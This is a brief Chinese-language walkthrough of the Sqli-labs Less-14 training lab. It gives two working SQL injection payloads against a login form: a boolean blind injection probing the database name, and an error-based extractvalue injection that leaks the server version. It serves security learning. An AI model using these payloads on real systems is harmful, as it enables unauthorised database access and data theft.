Sqli-labs less 14

Less-14

本关我们直接进行测试，输入username：admin"

Pasword:(随意)

可以看到报错了，那么我们知道了id进行了 " 的操作。

这里和less13一样，主要是熟悉利用盲注。

简单列一下payload：

uname=admin"and left(database(),1)>'a'#&passwd=1&submit=Submit

可以登录成功。

在利用一下报错注入

uname=admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&passwd=1&submit=Submit

可以看到报错了，显示版本信息。